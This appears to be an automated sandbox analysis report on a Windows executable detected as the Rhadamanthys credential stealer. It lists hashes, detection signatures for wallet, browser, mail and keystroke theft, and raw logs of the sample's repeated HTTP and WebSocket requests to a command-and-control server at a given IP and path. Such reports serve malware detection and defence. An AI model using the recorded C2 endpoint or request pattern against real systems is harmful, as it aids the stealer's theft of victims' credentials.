Windows Analysis Report
wdeeFKntav.exe

Overview

General Information

Sample name: wdeeFKntav.exe
renamed because original name is a hash value
Original sample name: e1bece7ba20dbb8100100f8cff2c415d.exe
Analysis ID: 1446715
MD5: e1bece7ba20dbb8100100f8cff2c415d
SHA1: 6ea8efc12ed24f00eb0f230dfec026a6816ba696
SHA256: 98942a0affa9721c90b097c2c6a9cd02959185526c3b7a44377a25b252a16fff
Tags: exe

Detection

RHADAMANTHYS
Score: 96
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected RHADAMANTHYS Stealer
.NET source code contains potential unpacker
AI detected suspicious sample
Found many strings related to Crypto-Wallets (likely being stolen)
Machine Learning detection for sample
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Contains functionality to call native functions
Contains functionality to detect virtual machines (STR)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Installs a raw input device (often for capturing keystrokes)
JA3 SSL client fingerprint seen in connection with other malware
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara detected Keylogger Generic

Classification

Name: Rhadamanthys
Description: According to PCrisk, Rhadamanthys is a stealer-type malware, and as its name implies - it is designed to extract data from infected machines. At the time of writing, this malware is spread through malicious websites mirroring those of genuine software such as AnyDesk, Zoom, Notepad++, and others. Rhadamanthys is downloaded alongside the real program, thus diminishing immediate user suspicion. These sites were promoted through Google ads, which superseded the legitimate search results on the Google search user.
Attribution:
  • Sandworm
Blogpost URLs: (none)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.rhadamanthys

AV Detection

Source: wdeeFKntav.exe Avira: detected
Source: wdeeFKntav.exe ReversingLabs: Detection: 76%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 99.9% probability
Source: wdeeFKntav.exe Joe Sandbox ML: detected
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_00007DF41F04FF7C CryptUnprotectData, 3_2_00007DF41F04FF7C
Source: wdeeFKntav.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 94.156.8.232:443 -> 192.168.2.6:49699 version: TLS 1.2
Source: unknown HTTPS traffic detected: 94.156.8.232:443 -> 192.168.2.6:49707 version: TLS 1.2
Source: unknown HTTPS traffic detected: 94.156.8.232:443 -> 192.168.2.6:49708 version: TLS 1.2
Source: unknown HTTPS traffic detected: 94.156.8.232:443 -> 192.168.2.6:49709 version: TLS 1.2
Source: unknown HTTPS traffic detected: 94.156.8.232:443 -> 192.168.2.6:49710 version: TLS 1.2
Source: unknown HTTPS traffic detected: 94.156.8.232:443 -> 192.168.2.6:49711 version: TLS 1.2
Source: unknown HTTPS traffic detected: 94.156.8.232:443 -> 192.168.2.6:49713 version: TLS 1.2
Source: unknown HTTPS traffic detected: 94.156.8.232:443 -> 192.168.2.6:49714 version: TLS 1.2
Source: unknown HTTPS traffic detected: 94.156.8.232:443 -> 192.168.2.6:49715 version: TLS 1.2
Source: unknown HTTPS traffic detected: 94.156.8.232:443 -> 192.168.2.6:49716 version: TLS 1.2
Source: unknown HTTPS traffic detected: 94.156.8.232:443 -> 192.168.2.6:49717 version: TLS 1.2
Source: unknown HTTPS traffic detected: 94.156.8.232:443 -> 192.168.2.6:49718 version: TLS 1.2
Source: unknown HTTPS traffic detected: 94.156.8.232:443 -> 192.168.2.6:49719 version: TLS 1.2
Source: unknown HTTPS traffic detected: 94.156.8.232:443 -> 192.168.2.6:49720 version: TLS 1.2
Source: unknown HTTPS traffic detected: 94.156.8.232:443 -> 192.168.2.6:49721 version: TLS 1.2
Source: unknown HTTPS traffic detected: 94.156.8.232:443 -> 192.168.2.6:49722 version: TLS 1.2
Source: unknown HTTPS traffic detected: 94.156.8.232:443 -> 192.168.2.6:49723 version: TLS 1.2
Source: wdeeFKntav.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831L source: OpenWith.exe, 00000003.00000002.3331408408.0000025B14E9A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wkernel32.pdb source: wdeeFKntav.exe, 00000000.00000003.2112932104.00000000046E0000.00000004.00000001.00020000.00000000.sdmp, wdeeFKntav.exe, 00000000.00000003.2112870082.00000000045C0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2115365389.0000000002D10000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2115429018.0000000004E30000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: wkernelbase.pdb source: wdeeFKntav.exe, 00000000.00000003.2113091379.00000000045C0000.00000004.00000001.00020000.00000000.sdmp, wdeeFKntav.exe, 00000000.00000003.2113264458.00000000047E0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2115786172.0000000004FD0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2115566580.0000000004DB0000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: OpenWith.exe, 00000003.00000002.3331408408.0000025B14E9A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ntdll.pdb source: wdeeFKntav.exe, 00000000.00000003.2111775317.00000000045C0000.00000004.00000001.00020000.00000000.sdmp, wdeeFKntav.exe, 00000000.00000003.2112323721.00000000047B0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2114700103.0000000004DB0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2114865216.0000000004FA0000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: wdeeFKntav.exe, 00000000.00000003.2112545924.00000000045C0000.00000004.00000001.00020000.00000000.sdmp, wdeeFKntav.exe, 00000000.00000003.2112684749.0000000004760000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2115217738.0000000004F50000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2115079095.0000000004DB0000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: ntdll.pdbUGP source: wdeeFKntav.exe, 00000000.00000003.2111775317.00000000045C0000.00000004.00000001.00020000.00000000.sdmp, wdeeFKntav.exe, 00000000.00000003.2112323721.00000000047B0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2114700103.0000000004DB0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2114865216.0000000004FA0000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: wdeeFKntav.exe, 00000000.00000003.2112545924.00000000045C0000.00000004.00000001.00020000.00000000.sdmp, wdeeFKntav.exe, 00000000.00000003.2112684749.0000000004760000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2115217738.0000000004F50000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2115079095.0000000004DB0000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: wkernelbase.pdbUGP source: wdeeFKntav.exe, 00000000.00000003.2113091379.00000000045C0000.00000004.00000001.00020000.00000000.sdmp, wdeeFKntav.exe, 00000000.00000003.2113264458.00000000047E0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2115786172.0000000004FD0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2115566580.0000000004DB0000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: wkernel32.pdbUGP source: wdeeFKntav.exe, 00000000.00000003.2112932104.00000000046E0000.00000004.00000001.00020000.00000000.sdmp, wdeeFKntav.exe, 00000000.00000003.2112870082.00000000045C0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2115365389.0000000002D10000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2115429018.0000000004E30000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: OpenWith.exe, 00000003.00000002.3331408408.0000025B14E9A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdbf source: OpenWith.exe, 00000003.00000002.3331408408.0000025B14E9A000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_00007DF41F058E20 GetLogicalDriveStringsW, 3_2_00007DF41F058E20
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\Default\AppData
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\Default
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\Default\AppData\Local\Microsoft\InputPersonalization\TrainedDataStore
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\Default\AppData\Local\Microsoft\InputPersonalization
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\Default\AppData\Local
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\Default\AppData\Local\Microsoft
Source: C:\Windows\System32\OpenWith.exe Code function: 4x nop then dec esp 3_2_0000025B14E20511
Source: C:\Windows\System32\OpenWith.exe Code function: 4x nop then dec esp 3_2_00007DF41F05BFA1
Source: Joe Sandbox View JA3 fingerprint: caec7ddf6889590d999d7ca1b76373b6
Source: global traffic HTTP traffic detected:
    GET /c1402fa62dc004/s209r0u5.lrdw9 HTTP/1.1
    Host: 94.156.8.232
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Language: en-US,en;q=0.9
    Accept-Encoding: gzip, deflate, br
    Cache-Control: max-age=0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
    If-Match: "ete6WHCQjxNcNjY1jEgGnY3tc9nSpnEcXroCoa+G1jzhT02yKm+Udo9y++Tli4waAsLCo0lRivK7ZSYZE/haMgBlbi1DSA=="
    Connection: close
Source: global traffic HTTP traffic detected:
    GET /c1402fa62dc004/s209r0u5.lrdw9 HTTP/1.1
    Host: 94.156.8.232
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Language: en-US,en;q=0.9
    Accept-Encoding: gzip, deflate, br
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
    Upgrade: websocket
    Connection: upgrade
    Sec-Websocket-Version: 13
    Sec-Websocket-Key: xU2b84xhXZbqQYI
Source: global traffic HTTP traffic detected:
    GET /c1402fa62dc004/s209r0u5.lrdw9 HTTP/1.1
    Host: 94.156.8.232
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Language: en-US,en;q=0.9
    Accept-Encoding: gzip, deflate, br
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
    Upgrade: websocket
    Connection: upgrade
    Sec-Websocket-Version: 13
    Sec-Websocket-Key: RAgFd01qjbFHl5s
Source: global traffic HTTP traffic detected:
    GET /c1402fa62dc004/s209r0u5.lrdw9 HTTP/1.1
    Host: 94.156.8.232
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Language: en-US,en;q=0.9
    Accept-Encoding: gzip, deflate, br
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
    Upgrade: websocket
    Connection: upgrade
    Sec-Websocket-Version: 13
    Sec-Websocket-Key: sW1tFC9u4h8HrYr
Source: global traffic HTTP traffic detected:
    GET /c1402fa62dc004/s209r0u5.lrdw9 HTTP/1.1
    Host: 94.156.8.232
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Language: en-US,en;q=0.9
    Accept-Encoding: gzip, deflate, br
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
    Upgrade: websocket
    Connection: upgrade
    Sec-Websocket-Version: 13
    Sec-Websocket-Key: M8ftLICEWZ7XZ6c
Source: global traffic HTTP traffic detected:
    GET /c1402fa62dc004/s209r0u5.lrdw9 HTTP/1.1
    Host: 94.156.8.232
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Language: en-US,en;q=0.9
    Accept-Encoding: gzip, deflate, br
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
    Upgrade: websocket
    Connection: upgrade
    Sec-Websocket-Version: 13
    Sec-Websocket-Key: Uu0iaFdbG5AryZb
Source: global traffic HTTP traffic detected:
    GET /c1402fa62dc004/s209r0u5.lrdw9 HTTP/1.1
    Host: 94.156.8.232
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Language: en-US,en;q=0.9
    Accept-Encoding: gzip, deflate, br
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
    Upgrade: websocket
    Connection: upgrade
    Sec-Websocket-Version: 13
    Sec-Websocket-Key: wmg987RLpbyqFSI
Source: global traffic HTTP traffic detected:
    GET /c1402fa62dc004/s209r0u5.lrdw9 HTTP/1.1
    Host: 94.156.8.232
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Language: en-US,en;q=0.9
    Accept-Encoding: gzip, deflate, br
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
    Upgrade: websocket
    Connection: upgrade
    Sec-Websocket-Version: 13
    Sec-Websocket-Key: Q3ZCdcjUNS1IbZW
Source: global traffic HTTP traffic detected:
    GET /c1402fa62dc004/s209r0u5.lrdw9 HTTP/1.1
    Host: 94.156.8.232
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Language: en-US,en;q=0.9
    Accept-Encoding: gzip, deflate, br
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
    Upgrade: websocket
    Connection: upgrade
    Sec-Websocket-Version: 13
    Sec-Websocket-Key: YpfXF0WYwZtHMSW
Source: global traffic HTTP traffic detected:
    GET /c1402fa62dc004/s209r0u5.lrdw9 HTTP/1.1
    Host: 94.156.8.232
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Language: en-US,en;q=0.9
    Accept-Encoding: gzip, deflate, br
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
    Upgrade: websocket
    Connection: upgrade
    Sec-Websocket-Version: 13
    Sec-Websocket-Key: gBYpLgo7UasXiuG
Source: global traffic HTTP traffic detected:
    GET /c1402fa62dc004/s209r0u5.lrdw9 HTTP/1.1
    Host: 94.156.8.232
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Language: en-US,en;q=0.9
    Accept-Encoding: gzip, deflate, br
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
    Upgrade: websocket
    Connection: upgrade
    Sec-Websocket-Version: 13
    Sec-Websocket-Key: TYefaI1F0MWWonG
Source: global traffic HTTP traffic detected:
    GET /c1402fa62dc004/s209r0u5.lrdw9 HTTP/1.1
    Host: 94.156.8.232
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Language: en-US,en;q=0.9
    Accept-Encoding: gzip, deflate, br
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
    Upgrade: websocket
    Connection: upgrade
    Sec-Websocket-Version: 13
    Sec-Websocket-Key: 2ku58F9dUSVrZha
Source: global traffic HTTP traffic detected:
    GET /c1402fa62dc004/s209r0u5.lrdw9 HTTP/1.1
    Host: 94.156.8.232
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Language: en-US,en;q=0.9
    Accept-Encoding: gzip, deflate, br
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
    Upgrade: websocket
    Connection: upgrade
    Sec-Websocket-Version: 13
    Sec-Websocket-Key: kvd5dMCTf5mbuop
Source: global traffic HTTP traffic detected:
    GET /c1402fa62dc004/s209r0u5.lrdw9 HTTP/1.1
    Host: 94.156.8.232
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Language: en-US,en;q=0.9
    Accept-Encoding: gzip, deflate, br
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
    Upgrade: websocket
    Connection: upgrade
    Sec-Websocket-Version: 13
    Sec-Websocket-Key: EbWxOS52DLQr2vF
Source: global traffic HTTP traffic detected:
    GET /c1402fa62dc004/s209r0u5.lrdw9 HTTP/1.1
    Host: 94.156.8.232
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Language: en-US,en;q=0.9
    Accept-Encoding: gzip, deflate, br
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
    Upgrade: websocket
    Connection: upgrade
    Sec-Websocket-Version: 13
    Sec-Websocket-Key: f5cmLiHAmSPq8o0
Source: global traffic HTTP traffic detected:
    GET /c1402fa62dc004/s209r0u5.lrdw9 HTTP/1.1
    Host: 94.156.8.232
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Language: en-US,en;q=0.9
    Accept-Encoding: gzip, deflate, br
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
    Upgrade: websocket
    Connection: upgrade
    Sec-Websocket-Version: 13
    Sec-Websocket-Key: oqscagi87YhXdh9
Source: global traffic HTTP traffic detected:
    GET /c1402fa62dc004/s209r0u5.lrdw9 HTTP/1.1
    Host: 94.156.8.232
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Language: en-US,en;q=0.9
    Accept-Encoding: gzip, deflate, br
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
    Upgrade: websocket
    Connection: upgrade
    Sec-Websocket-Version: 13
    Sec-Websocket-Key: IDbbhmNh0FLcLVU
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.8.232 (50 identical entries)
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_00007DF41F081950 WSARecv, 3_2_00007DF41F081950
Source: global traffic HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Content-Type: text/html; charset=utf-8
    Server: Microsoft-IIS/8.0
    Date: Thu, 23 May 2024 18:15:27 GMT
    Content-Length: 166
    Connection: close
Source: global traffic HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Content-Type: text/html; charset=utf-8
    Server: Microsoft-IIS/8.0
    Date: Thu, 23 May 2024 18:15:34 GMT
    Content-Length: 166
    Connection: close
Source: global traffic HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Content-Type: text/html; charset=utf-8
    Server: Microsoft-IIS/8.0
    Date: Thu, 23 May 2024 18:15:41 GMT
    Content-Length: 166
    Connection: close
Source: global traffic HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Content-Type: text/html; charset=utf-8
    Server: Microsoft-IIS/8.0
    Date: Thu, 23 May 2024 18:15:47 GMT
    Content-Length: 166
    Connection: close
Source: global traffic HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Content-Type: text/html; charset=utf-8
    Server: Microsoft-IIS/8.0
    Date: Thu, 23 May 2024 18:15:53 GMT
    Content-Length: 166
    Connection: close
Source: global traffic HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Content-Type: text/html; charset=utf-8
    Server: Microsoft-IIS/8.0
    Date: Thu, 23 May 2024 18:15:59 GMT
    Content-Length: 166
    Connection: close
Source: global traffic HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Content-Type: text/html; charset=utf-8
    Server: Microsoft-IIS/8.0
    Date: Thu, 23 May 2024 18:16:06 GMT
    Content-Length: 166
    Connection: close
Source: global traffic HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Content-Type: text/html; charset=utf-8
    Server: Microsoft-IIS/8.0
    Date: Thu, 23 May 2024 18:16:13 GMT
    Content-Length: 166
    Connection: close
Source: global traffic HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Content-Type: text/html; charset=utf-8
    Server: Microsoft-IIS/8.0
    Date: Thu, 23 May 2024 18:16:19 GMT
    Content-Length: 166
    Connection: close
Source: global traffic HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Content-Type: text/html; charset=utf-8
    Server: Microsoft-IIS/8.0
    Date: Thu, 23 May 2024 18:16:25 GMT
    Content-Length: 166
    Connection: close
Source: global traffic HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Content-Type: text/html; charset=utf-8
    Server: Microsoft-IIS/8.0
    Date: Thu, 23 May 2024 18:16:32 GMT
    Content-Length: 166
    Connection: close
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/8.0Date: Thu, 23 May 2024 18:16:39 GMTContent-Length: 166Connection: close
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/8.0Date: Thu, 23 May 2024 18:16:45 GMTContent-Length: 166Connection: close
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/8.0Date: Thu, 23 May 2024 18:16:51 GMTContent-Length: 166Connection: close
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/8.0Date: Thu, 23 May 2024 18:16:58 GMTContent-Length: 166Connection: close
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/8.0Date: Thu, 23 May 2024 18:17:04 GMTContent-Length: 166Connection: close
Source: dialer.exe, 00000002.00000002.2240294940.00000000026EC000.00000004.00000010.00020000.00000000.sdmp, OpenWith.exe, OpenWith.exe, 00000003.00000003.2318510901.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2352844205.0000025B16E37000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000002.3331284161.0000025B14E20000.00000040.00000001.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2318168734.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2338132971.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2336471326.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2329383412.0000025B16E39000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2339567729.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2287231565.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000002.3332371531.0000025B16E37000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2319262155.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2324301600.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2322773513.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2327778333.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2319977059.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2353100598.0000025B16E37000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://94.156.8.232/c1402fa62dc004/s209r0u5.lrdw9
Source: dialer.exe, 00000002.00000002.2241516364.0000000004D2F000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000002.3331284161.0000025B14E20000.00000040.00000001.00020000.00000000.sdmp String found in binary or memory: https://94.156.8.232/c1402fa62dc004/s209r0u5.lrdw9kernelbasentdllkernel32GetProcessMitigationPolicyH
Source: OpenWith.exe, 00000003.00000003.2318510901.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2352844205.0000025B16E37000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2318168734.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2338132971.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2336471326.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2329383412.0000025B16E39000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2339567729.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2287231565.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000002.3332371531.0000025B16E37000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2319262155.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2324301600.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2322773513.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2327778333.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2319977059.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2353100598.0000025B16E37000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://94.156.8.232/c1402fa62dc004/s209r0u5.lrdw9x
Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17024000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2319841245.0000025B17024000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2319706890.0000025B17024000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2320103191.0000025B17024000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2319572365.0000025B17024000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2318779583.0000025B17023000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: OpenWith.exe, 00000003.00000003.2318779583.0000025B17023000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
